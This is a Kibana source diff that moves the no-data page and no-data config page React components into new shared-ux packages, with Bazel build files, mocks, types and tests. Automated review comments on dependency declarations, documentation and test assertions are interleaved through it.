@@ -0,0 +1,67 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import { AbstractStorybookMock } from '@kbn/shared-ux-storybook-mock'; +import type { ArgumentParams } from '@kbn/shared-ux-storybook-mock'; +import type { NoDataPageProps, NoDataPageServices } from '@kbn/shared-ux-page-no-data-types'; +import { NoDataCardStorybookMock } from '@kbn/shared-ux-card-no-data-mocks'; +import type { NoDataCardStorybookParams } from '@kbn/shared-ux-card-no-data-mocks'; + +type PropArguments = Pick; + +export type Params = ArgumentParams & NoDataCardStorybookParams; + +const dataCardMock = new NoDataCardStorybookMock(); + +export class NoDataPageStorybookMock extends AbstractStorybookMock< + NoDataPageProps, + NoDataPageServices, + PropArguments +> { + propArguments = { + solution: { + control: 'text', + defaultValue: 'Observability', + }, + logo: { + control: { type: 'radio' }, + options: ['logoElastic', 'logoKibana', 'logoCloud', undefined], + defaultValue: undefined, + }, + docsLink: { + control: 'text', + defaultValue: 'docs/link', + }, + pageTitle: { + control: 'text', + defaultValue: '', + }, + }; + + serviceArguments = {}; + + dependencies = [dataCardMock]; + + getProps(params?: Params): NoDataPageProps { + return { + action: { + elasticAgent: { + title: 'Add Integrations', + }, + }, + solution: this.getArgumentValue('solution', params), + logo: this.getArgumentValue('logo', params), + docsLink: this.getArgumentValue('docsLink', params), + pageTitle: this.getArgumentValue('pageTitle', params), + }; + } + + getServices(params: Params): NoDataPageServices { + return { ...dataCardMock.getServices(params) }; + } +} 
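Review bot: `getProps(params?: Params)` and `getServices(params: Params)` in `NoDataPageStorybookMock` disagree on whether `params` is optional, and `getServices` forwards it straight to `dataCardMock.getServices(params)`; since `getProps` tolerates the omission, `getServices(params?: Params)` would match unless the base class signature forbids it. `serviceArguments = {}` means Storybook exposes no toggle for `canAccessFleet`, which the sibling Jest mock in `jest.ts` treats as the one page-level parameter; if that is deliberate a one-line comment (`// page-level services are all supplied by the card mock`) would stop readers from treating it as an omission. The class and its `propArguments` field carry no TSDoc; a sentence stating that the mock composes the card mock via `dependencies` would document the only non-obvious part.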
diff --git a/packages/shared-ux/page/no_data/mocks/tsconfig.json b/packages/shared-ux/page/no_data/mocks/tsconfig.json new file mode 100644 index 0000000000000..dc96ec41f9035 --- /dev/null +++ b/packages/shared-ux/page/no_data/mocks/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react" + ] + }, + "include": [ + "**/*.ts", + "**/*.tsx", + ] +} diff --git a/packages/shared-ux/page/no_data/types/BUILD.bazel b/packages/shared-ux/page/no_data/types/BUILD.bazel new file mode 100644 index 0000000000000..618a82a8f6a98 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/BUILD.bazel 
@@ -0,0 +1,59 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "types" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-types" + +SRCS = glob( + [ + "*.d.ts", + ] +) + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ +] + +js_library( + name = PKG_DIRNAME, + srcs = SRCS + NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS, + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +alias( + name = "npm_module_types", + actual = ":" + PKG_DIRNAME, + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data/types/README.mdx b/packages/shared-ux/page/no_data/types/README.mdx new file mode 100644 index 0000000000000..7890d0ef8a3c4 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/README.mdx @@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-types + +Empty package generated by @kbn/generate diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts b/packages/shared-ux/page/no_data/types/index.d.ts similarity index 66% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts rename to packages/shared-ux/page/no_data/types/index.d.ts index e22f7a7b81a77..3db9e80c950c9 100644 
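Review bot: `RUNTIME_DEPS = []` in `no_data/types/BUILD.bazel`, although the package's `index.d.ts` in this diff imports from `@elastic/eui` and `@kbn/shared-ux-card-no-data-types`; if consumers resolve those type imports through this `js_library` (the `npm_module_types` alias points straight at it), `"//packages/shared-ux/card/no_data/types",` and `"@npm//@elastic/eui",` belong in `RUNTIME_DEPS`. I cannot see how the other `*/types` packages in the repo declare this, so treat it as a question rather than a defect. The block comment above `RUNTIME_DEPS` still describes runtime code, which a types-only package never has; trimming it to one line would make the empty list look intentional.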
--- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/types.ts +++ b/packages/shared-ux/page/no_data/types/index.d.ts @@ -7,31 +7,50 @@ */ import { CommonProps } from '@elastic/eui'; -import { NoDataCardProps } from '@kbn/shared-ux-card-no-data'; +import { + NoDataCardProps, + NoDataCardServices, + NoDataCardKibanaDependencies, +} from '@kbn/shared-ux-card-no-data-types'; export type NoDataPageActions = NoDataCardProps; -export interface NoDataPageProps extends CommonProps { +export interface ActionCardProps { /** - * Single name for the current solution, used to auto-generate the title, logo, description, and button label + * An object of `NoDataPageActions`. + * + * Use `elasticAgent` as the primary key for pre-configured cards of this type. + * Otherwise use a custom key that contains `EuiCard` props. */ - solution: string; + action: Record; +} + +export interface NoDataPageProps extends CommonProps, ActionCardProps { /** - * Optionally replace the auto-generated logo + * Single name for the current solution, used to auto-generate the title, logo, description, and button label */ - logo?: string; + solution: string; /** * Required to set the docs link for the whole solution */ docsLink: string; /** - * Optionally replace the auto-generated page title (h1) + * Optionally replace the auto-generated logo */ - pageTitle?: string; + logo?: string; /** - * An object of `NoDataPageActions`. - * Use `elasticAgent` as the primary key for pre-configured cards of this type. - * Otherwise use a custom key that contains `EuiCard` props. + * Optionally replace the auto-generated page title (h1) */ - action: Record; + pageTitle?: string; } + +/** + * A list of services that are consumed by this component. + */ +export type NoDataPageServices = NoDataCardServices; + +/** + * An interface containing a collection of Kibana plugins and services required to + * render this component. + */ +export type NoDataPageKibanaDependencies = NoDataCardKibanaDependencies; 
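Review bot: The newly extracted `ActionCardProps` interface in `index.d.ts` has no TSDoc of its own, while every other exported symbol in the file does; add `/** Props describing the action cards rendered by `NoDataPage`; mixed into `NoDataPageProps`. */` above `export interface ActionCardProps`. The `action: Record` declaration appears without its type arguments in the hunk as rendered, so I assume `Record<string, NoDataPageActions>` survived the move. Since the file is now an ambient `.d.ts`, the value-style `import { … }` lines could become `import type { … }`, which makes the types-only intent of the package explicit.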
diff --git a/packages/shared-ux/page/no_data/types/package.json b/packages/shared-ux/page/no_data/types/package.json new file mode 100644 index 0000000000000..8e9dce1b11f45 --- /dev/null +++ b/packages/shared-ux/page/no_data/types/package.json @@ -0,0 +1,7 @@ +{ + "name": "@kbn/shared-ux-page-no-data-types", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/shared-ux/page/no_data/types/tsconfig.json b/packages/shared-ux/page/no_data/types/tsconfig.json new file mode 100644 index 0000000000000..7a4adfcdbecff --- /dev/null +++ b/packages/shared-ux/page/no_data/types/tsconfig.json @@ -0,0 +1,14 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "stripInternal": false, + "types": [] + }, + "include": [ + "*.d.ts" + ] +} diff --git a/packages/shared-ux/page/no_data_config/impl/BUILD.bazel b/packages/shared-ux/page/no_data_config/impl/BUILD.bazel new file mode 100644 index 0000000000000..73c069342a5a0 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/BUILD.bazel 
@@ -0,0 +1,138 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "impl" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + "src/**/*.tsx", + "src/**/*.mdx", + ], + exclude = [ + "**/*.test.*", + "**/*.stories.*", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "@npm//classnames", + "@npm//@elastic/eui", + "//packages/shared-ux/page/solution_nav", + "//packages/shared-ux/page/no_data/impl", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. 
"//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/node", + "@npm//@types/jest", + "@npm//@types/react", + "@npm//classnames", + "@npm//@elastic/eui", + "//packages/shared-ux/page/solution_nav:npm_module_types", + "//packages/shared-ux/page/no_data/impl:npm_module_types", + "//packages/shared-ux/page/no_data_config/types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/impl/README.mdx b/packages/shared-ux/page/no_data_config/impl/README.mdx new file mode 100644 index 0000000000000..a7f73534bbd09 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/README.mdx 
@@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/link/redirect_app/types/jest.config.js b/packages/shared-ux/page/no_data_config/impl/jest.config.js similarity index 80% rename from packages/shared-ux/link/redirect_app/types/jest.config.js rename to packages/shared-ux/page/no_data_config/impl/jest.config.js index 53269ab395d09..09a8f39000c1d 100644 --- a/packages/shared-ux/link/redirect_app/types/jest.config.js +++ b/packages/shared-ux/page/no_data_config/impl/jest.config.js @@ -7,7 +7,7 @@ */ module.exports = { - preset: '@kbn/test/jest_node', + preset: '@kbn/test', rootDir: '../../../../..', - roots: ['/packages/shared-ux/link/redirect_app/types'], + roots: ['/packages/shared-ux/page/no_data_config/impl'], }; diff --git a/packages/shared-ux/page/no_data_config/impl/package.json b/packages/shared-ux/page/no_data_config/impl/package.json new file mode 100644 index 0000000000000..216bba70b5d50 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} diff --git a/packages/kbn-shared-ux-components/src/page_template/util/constants.ts b/packages/shared-ux/page/no_data_config/impl/src/constants.ts similarity index 78% rename from packages/kbn-shared-ux-components/src/page_template/util/constants.ts rename to packages/shared-ux/page/no_data_config/impl/src/constants.ts index 92dbe1cb16279..1c4c2685433d4 100644 --- a/packages/kbn-shared-ux-components/src/page_template/util/constants.ts +++ b/packages/shared-ux/page/no_data_config/impl/src/constants.ts 
@@ -6,11 +6,11 @@ * Side Public License, v 1. */ -import { KibanaPageTemplateProps } from '../types'; +import type { NoDataConfigPageProps } from '@kbn/shared-ux-page-no-data-config-types'; export const NO_DATA_PAGE_MAX_WIDTH = 950; -export const NO_DATA_PAGE_TEMPLATE_PROPS: KibanaPageTemplateProps = { +export const NO_DATA_PAGE_TEMPLATE_PROPS: NoDataConfigPageProps = { restrictWidth: NO_DATA_PAGE_MAX_WIDTH, template: 'centeredBody', pageContentProps: { diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts b/packages/shared-ux/page/no_data_config/impl/src/index.ts similarity index 64% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts rename to packages/shared-ux/page/no_data_config/impl/src/index.ts index f8c272c8f9875..baf373726144d 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/index.ts +++ b/packages/shared-ux/page/no_data_config/impl/src/index.ts @@ -5,4 +5,11 @@ * in compliance with, at your election, the Elastic License 2.0 or the Server * Side Public License, v 1. */ + export { NoDataConfigPage, NoDataConfigPageWithSolutionNavBar } from './no_data_config_page'; +export { NoDataConfigPageKibanaProvider, NoDataConfigPageProvider } from './services'; +export type { + NoDataConfigPageProps, + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; diff --git a/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx new file mode 100644 index 0000000000000..3106a5b41416d --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.stories.tsx 
@@ -0,0 +1,39 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React from 'react'; + +import { NoDataConfigPageStorybookMock } from '@kbn/shared-ux-page-no-data-config-mocks'; +import type { NoDataConfigPageStorybookParams } from '@kbn/shared-ux-page-no-data-config-mocks'; + +import { NoDataConfigPage as Component } from './no_data_config_page'; + +import { NoDataConfigPageProvider } from './services'; +import mdx from '../README.mdx'; + +const mock = new NoDataConfigPageStorybookMock(); + +export default { + title: 'No Data/Page/No Data Config Page', + description: 'A component to display when there is no data available', + parameters: { + docs: { + page: mdx, + }, + }, +}; + +export const NoDataConfigPage = (params: NoDataConfigPageStorybookParams) => { + return ( + + + + ); +}; + +NoDataConfigPage.argTypes = mock.getArgumentTypes(); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx similarity index 55% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx rename to packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx index dc618a068e120..fbd897314eceb 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.test.tsx +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.test.tsx 
@@ -6,13 +6,17 @@ * Side Public License, v 1. */ -import { shallow } from 'enzyme'; import React from 'react'; +import { mountWithIntl } from '@kbn/test-jest-helpers'; + +import { getNoDataConfigPageServicesMock } from '@kbn/shared-ux-page-no-data-config-mocks'; + import { NoDataConfigPage } from './no_data_config_page'; +import { NoDataConfigPageProvider } from './services'; describe('NoDataConfigPage', () => { const noDataConfig = { - solution: 'Kibana', + solution: 'Solution', logo: 'logoKibana', docsLink: 'test-link', action: { @@ -24,7 +28,12 @@ describe('NoDataConfigPage', () => { }, }; test('renders', () => { - const component = shallow(); - expect(component).toMatchSnapshot(); + const component = mountWithIntl( + + + + ); + expect(component.find('h1').html()).toContain('Welcome to Elastic Solution!'); + expect(component.find('button').html()).toContain('Click me'); }); }); diff --git a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx similarity index 54% rename from packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx rename to packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx index c21431a8107fe..f5153aa25686e 100644 --- a/packages/kbn-shared-ux-components/src/page_template/no_data_page/no_data_config_page/no_data_config_page.tsx +++ b/packages/shared-ux/page/no_data_config/impl/src/no_data_config_page.tsx 
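Review bot: `expect(component.find('h1').html()).toContain('Welcome to Elastic Solution!')` matches against serialized markup, so any attribute value or nested element containing that text also satisfies it and an unrelated markup change in EUI can break it; `component.find('h1').text()` asserts the rendered text directly, and the same applies to the `button` check. The `noDataConfig.action` block that the `'Click me'` expectation depends on lies between the two hunks and is not visible here. The assertions are a clear improvement over the removed snapshot, so this is only about how the text is matched.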
@@ -7,29 +7,36 @@ */ import React from 'react'; +import classNames from 'classnames'; import { EuiPageTemplate } from '@elastic/eui'; + import { withSolutionNav } from '@kbn/shared-ux-page-solution-nav'; +import { NoDataPage } from '@kbn/shared-ux-page-no-data'; +import type { NoDataConfigPageProps } from '@kbn/shared-ux-page-no-data-config-types'; + +import { NO_DATA_PAGE_TEMPLATE_PROPS } from './constants'; -import { NoDataPage } from '../no_data_page'; -import { KibanaPageTemplateProps } from '../../types'; -import { getClasses, NO_DATA_PAGE_TEMPLATE_PROPS } from '../../util'; +const getClasses = (template?: string, className?: string) => { + return classNames( + 'kbnPageTemplate', + template ? { [`kbnPageTemplate--${template}`]: template } : '', + className || '' + ); +}; -export const NoDataConfigPage = (props: KibanaPageTemplateProps) => { - const { className, noDataConfig, ...rest } = props; +export const NoDataConfigPage = (props: NoDataConfigPageProps) => { + const { className: classNameProp, noDataConfig, ...rest } = props; if (!noDataConfig) { return null; } - const template = NO_DATA_PAGE_TEMPLATE_PROPS.template; - const classes = getClasses(template, className); + const className = getClasses(NO_DATA_PAGE_TEMPLATE_PROPS.template, classNameProp); return ( diff --git a/packages/shared-ux/page/no_data_config/impl/src/services.tsx b/packages/shared-ux/page/no_data_config/impl/src/services.tsx new file mode 100644 index 0000000000000..a7d0d118c053d --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/src/services.tsx 
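Review bot: The new local `getClasses` in `no_data_config_page.tsx` wraps `classnames` in a ternary and a `|| ''` that `classnames` already handles, since it drops falsy entries; `classNames('kbnPageTemplate', template && \`kbnPageTemplate--${template}\`, className)` produces the same string. A one-line TSDoc would also help, e.g. `/** Builds the `kbnPageTemplate` class list for the centered no-data layout. */`, given that the helper used to live in the shared `util` module and now exists only for this page. The component's `return (` expression is not visible in the hunk as rendered, so I have not reviewed the JSX.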
@@ -0,0 +1,35 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import React, { FC } from 'react'; + +import { NoDataPageProvider, NoDataPageKibanaProvider } from '@kbn/shared-ux-page-no-data'; +import type { + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +/** + * A Context Provider that provides services to the component and its dependencies. + */ +export const NoDataConfigPageProvider: FC = ({ + children, + ...services +}) => { + return {children}; +}; + +/** + * Kibana-specific Provider that maps dependencies to services. + */ +export const NoDataConfigPageKibanaProvider: FC = ({ + children, + ...dependencies +}) => { + return {children}; +}; diff --git a/packages/shared-ux/page/no_data_config/impl/tsconfig.json b/packages/shared-ux/page/no_data_config/impl/tsconfig.json new file mode 100644 index 0000000000000..40ed24ecac4d2 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/impl/tsconfig.json @@ -0,0 +1,20 @@ +{ + "extends": "../../../../../tsconfig.bazel.json", + "compilerOptions": { + "declaration": true, + "declarationMap": true, + "emitDeclarationOnly": true, + "outDir": "target_types", + "rootDir": "src", + "stripInternal": false, + "types": [ + "jest", + "node", + "react", + "@kbn/ambient-ui-types", + ] + }, + "include": [ + "src/**/*" + ] +} diff --git a/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel b/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel new file mode 100644 index 0000000000000..0a797fd6de629 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/BUILD.bazel 
@@ -0,0 +1,140 @@ +load("@npm//@bazel/typescript:index.bzl", "ts_config") +load("@build_bazel_rules_nodejs//:index.bzl", "js_library") +load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") + +PKG_DIRNAME = "mocks" +PKG_REQUIRE_NAME = "@kbn/shared-ux-page-no-data-config-mocks" + +SOURCE_FILES = glob( + [ + "src/**/*.ts", + ], + exclude = [ + "**/*.config.js", + "**/*.mock.*", + "**/*.test.*", + "**/*.stories.*", + "**/__snapshots__", + "**/integration_tests", + "**/mocks", + "**/scripts", + "**/storybook", + "**/test_fixtures", + "**/test_helpers", + ], +) + +SRCS = SOURCE_FILES + +filegroup( + name = "srcs", + srcs = SRCS, +) + +NPM_MODULE_EXTRA_FILES = [ + "package.json", +] + +# In this array place runtime dependencies, including other packages and NPM packages +# which must be available for this code to run. +# +# To reference other packages use: +# "//repo/relative/path/to/package" +# eg. "//packages/kbn-utils" +# +# To reference a NPM package use: +# "@npm//name-of-package" +# eg. "@npm//lodash" +RUNTIME_DEPS = [ + "@npm//react", + "//packages/shared-ux/page/no_data/mocks", +] + +# In this array place dependencies necessary to build the types, which will include the +# :npm_module_types target of other packages and packages from NPM, including @types/* +# packages. +# +# To reference the types for another package use: +# "//repo/relative/path/to/package:npm_module_types" +# eg. 
"//packages/kbn-utils:npm_module_types" +# +# References to NPM packages work the same as RUNTIME_DEPS +TYPES_DEPS = [ + "@npm//@types/jest", + "@npm//@types/node", + "@npm//@types/react", + "//packages/shared-ux/page/no_data_config/types", + "//packages/shared-ux/page/no_data/mocks:npm_module_types", + "//packages/shared-ux/storybook/mock:npm_module_types", +] + +jsts_transpiler( + name = "target_node", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", +) + +jsts_transpiler( + name = "target_web", + srcs = SRCS, + build_pkg_name = package_name(), + root_input_dir = "src", + web = True, +) + +ts_config( + name = "tsconfig", + src = "tsconfig.json", + deps = [ + "//:tsconfig.base.json", + "//:tsconfig.bazel.json", + ], +) + +ts_project( + name = "tsc_types", + args = ['--pretty'], + srcs = SRCS, + deps = TYPES_DEPS, + declaration = True, + declaration_map = True, + emit_declaration_only = True, + out_dir = "target_types", + root_dir = "src", + tsconfig = ":tsconfig", +) + +js_library( + name = PKG_DIRNAME, + srcs = NPM_MODULE_EXTRA_FILES, + deps = RUNTIME_DEPS + [":target_node", ":target_web"], + package_name = PKG_REQUIRE_NAME, + visibility = ["//visibility:public"], +) + +pkg_npm( + name = "npm_module", + deps = [":" + PKG_DIRNAME], +) + +filegroup( + name = "build", + srcs = [":npm_module"], + visibility = ["//visibility:public"], +) + +pkg_npm_types( + name = "npm_module_types", + srcs = SRCS, + deps = [":tsc_types"], + package_name = PKG_REQUIRE_NAME, + tsconfig = ":tsconfig", + visibility = ["//visibility:public"], +) + +filegroup( + name = "build_types", + srcs = [":npm_module_types"], + visibility = ["//visibility:public"], +) diff --git a/packages/shared-ux/page/no_data_config/mocks/README.md b/packages/shared-ux/page/no_data_config/mocks/README.md new file mode 100644 index 0000000000000..bcf739e2d9658 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/README.md 
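Review bot: `RUNTIME_DEPS` in `no_data_config/mocks/BUILD.bazel` omits `//packages/shared-ux/storybook/mock` even though `TYPES_DEPS` declares its `:npm_module_types`; the sibling `no_data/mocks/BUILD.bazel` earlier in this diff lists both, and its `storybook.ts` extends `AbstractStorybookMock` from that package. The `src/storybook.ts` of this package starts after the end of this chunk, so if it does the same the runtime dependency is missing here. As in the sibling package, `@npm//react` is declared although the mock source shown imports nothing from React.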
@@ -0,0 +1,3 @@ +# @kbn/shared-ux-page-no-data-config-mocks + +Empty package generated by @kbn/generate diff --git a/packages/shared-ux/page/no_data_config/mocks/package.json b/packages/shared-ux/page/no_data_config/mocks/package.json new file mode 100644 index 0000000000000..32245715f2b1b --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/package.json @@ -0,0 +1,8 @@ +{ + "name": "@kbn/shared-ux-page-no-data-config-mocks", + "private": true, + "version": "1.0.0", + "main": "./target_node/index.js", + "browser": "./target_web/index.js", + "license": "SSPL-1.0 OR Elastic License 2.0" +} \ No newline at end of file diff --git a/src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts b/packages/shared-ux/page/no_data_config/mocks/src/index.ts similarity index 62% rename from src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts rename to packages/shared-ux/page/no_data_config/mocks/src/index.ts index 79ef0dcad9d7a..4e6911f89e37b 100644 --- a/src/plugins/chart_expressions/expression_gauge/public/components/icons/index.ts +++ b/packages/shared-ux/page/no_data_config/mocks/src/index.ts @@ -6,5 +6,7 @@ * Side Public License, v 1. */ -export { HorizontalBulletIcon } from './horizontal_bullet_icon'; -export { VerticalBulletIcon } from './vertical_bullet_icon'; +export { getServicesMock as getNoDataConfigPageServicesMock } from './jest'; + +export { NoDataConfigPageStorybookMock } from './storybook'; +export type { Params as NoDataConfigPageStorybookParams } from './storybook'; diff --git a/packages/shared-ux/page/no_data_config/mocks/src/jest.ts b/packages/shared-ux/page/no_data_config/mocks/src/jest.ts new file mode 100644 index 0000000000000..f4f2c48e4ce03 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/src/jest.ts 
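Review bot: jest.ts in the next hunk also exports `getKibanaDependenciesMock`, but this new index.ts entry point only re-exports `getServicesMock`, so consumers of `@kbn/shared-ux-page-no-data-config-mocks` cannot reach the Kibana-dependencies mock through the package. If that factory is meant to be public, add `export { getKibanaDependenciesMock as getNoDataConfigPageKibanaDependenciesMock } from './jest';` beside the existing re-export; if it is not, drop it from jest.ts so the package surface stays as small as the index suggests.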
@@ -0,0 +1,33 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0 and the Server Side Public License, v 1; you may not use this file except + * in compliance with, at your election, the Elastic License 2.0 or the Server + * Side Public License, v 1. + */ + +import type { + NoDataConfigPageServices, + NoDataConfigPageKibanaDependencies, +} from '@kbn/shared-ux-page-no-data-config-types'; + +import { + getNoDataPageServicesMock, + getNoDataPageKibanaDependenciesMock, +} from '@kbn/shared-ux-page-no-data-mocks'; + +export const getServicesMock = () => { + const services: NoDataConfigPageServices = { + ...getNoDataPageServicesMock(), + }; + + return services; +}; + +export const getKibanaDependenciesMock = () => { + const dependencies: NoDataConfigPageKibanaDependencies = { + ...getNoDataPageKibanaDependenciesMock(), + }; + + return dependencies; +}; diff --git a/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts b/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts new file mode 100644 index 0000000000000..5c36fc79f90a7 --- /dev/null +++ b/packages/shared-ux/page/no_data_config/mocks/src/storybook.ts 
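Review bot: The two exported mock factories carry no TSDoc and neither declares a return type, so a reader has to follow the spread into `@kbn/shared-ux-page-no-data-mocks` to learn what they produce. Since each body only spreads the no-data page mock into the config-page type, a one-liner each is enough, e.g. `/** Mocked NoDataConfigPageServices; currently identical to getNoDataPageServicesMock(). */` and the equivalent for `getKibanaDependenciesMock`. Adding explicit `(): NoDataConfigPageServices` / `(): NoDataConfigPageKibanaDependencies` return annotations on the arrows would also make the exported signatures checked rather than inferred from the local const.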
